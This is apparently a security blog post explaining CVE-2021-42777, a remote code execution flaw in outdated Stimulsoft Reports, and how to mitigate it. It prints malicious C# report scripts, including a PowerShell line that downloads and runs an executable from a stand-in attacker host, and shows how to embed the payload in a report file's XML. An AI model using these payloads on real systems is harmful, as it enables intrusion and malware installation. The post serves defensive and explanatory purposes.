Stimulsoft Reports is a widely used reporting tool for .NET, often embedded in enterprise web and desktop applications. But if you’re still running version 2013.1.160. (or similar outdated builds), your application may be seriously at risk due to CVE-2021-42777. This vulnerability allows remote code execution (RCE) by abusing the report compilation feature. In this post, I’ll break down how the exploit works, what the code looks like, and how you can protect your system.

What’s the Issue?

Stimulsoft Reports' "Compilation Mode" lets users generate reports using C#/VB.NET scripts for custom expressions and events—useful, but dangerous. Any code in these scripts gets compiled and executed *on the server or client* displaying the report. There’s no real sandbox—just straight execution as the app’s user.

Original vendor advisory:  
- Stimulsoft Changelog 2021  
- NVD CVE Entry

Exploit Overview

An attacker can create or modify a Stimulsoft report file (.mrt, .mrz, etc.) to include malicious C# code. When this report is rendered, the payload is executed, for example, calling System.Diagnostics.Process.Start to spawn a process (like cmd.exe or PowerShell).

Typical Attack Paths

- Web Reporting: Upload or push a crafted report. When staff or another user views it, the exploit runs.

Desktop Viewer: Trick a user into opening an evil .mrt file.

- Server-Side Generation: If reports are compiled server-side, *every* request could trigger code execution with server privileges.

Example: Malicious Report Snippet

Inside the report template, scripts can be added to events like BeginRender or bound to custom buttons, etc.

Here’s a *weaponized* snippet you might see in a manipulated Stimulsoft report component’s script area:

using System.Diagnostics;

public void BeginRender()
{
    // DANGEROUS: Will run any process with app user rights
    Process.Start("calc.exe"); // Spawns Calculator - proof of concept
    // For real attacks, replace with something nastier: Downloaders, reverse shells, etc.
}

Or for a Powershell reverse shell on Windows

using System.Diagnostics;

public void BeginRender()
{
    Process.Start("powershell.exe", "-c \"Invoke-WebRequest http://evilserver.com/payload.exe -OutFile C:\\temp\\bad.exe; Start-Process C:\\temp\\bad.exe\"");
}

You could insert this via the Stimulsoft Designer (Script tab) or directly by editing the XML in the .mrt file.

Trigger Execution:

- When any user (or the server itself) renders the report in any Stimulsoft-powered viewer, the payload runs instantly—possibly with full SYSTEM or admin rights.

Sneaking the payload into the report XML (ReportScript node)

<ReportScript>
  <![CDATA[
    using System.Diagnostics;
    public void BeginRender() {
        Process.Start("calc.exe");
    }
  ]]>
</ReportScript>

Stimulsoft Reports 2013.1.160. and earlier (vendor confirms all older versions).

- Apps using "Compilation Mode" (not all Stimulsoft setups compile scripts server-side, but many legacy or "power user" features do).

Stimulsoft fixed this in later builds by restricting code execution and adding sandboxing.  
Read their official security notes for patches.

Upgrade NOW: Use the most recent version of Stimulsoft Reports, ideally 2021.4 or newer.

- Disable Compilation Mode if possible, especially for user-submitted/untrusted reports.

References & Read More

- CVE-2021-42777 – NIST
- Stimulsoft Release Notes
- Exploit-DB Example *(Sample)*

Final Word

If you use Stimulsoft Reports, treat report files as untrusted code—because that’s what they are. Always update and lock down upload/report editing permissions. Vulnerabilities like CVE-2021-42777 show how trusted reporting tools can become huge attack surfaces when left unpatched.

Timeline

Published on: 10/29/2022 17:15:00 UTC
Last modified on: 11/01/2022 18:41:00 UTC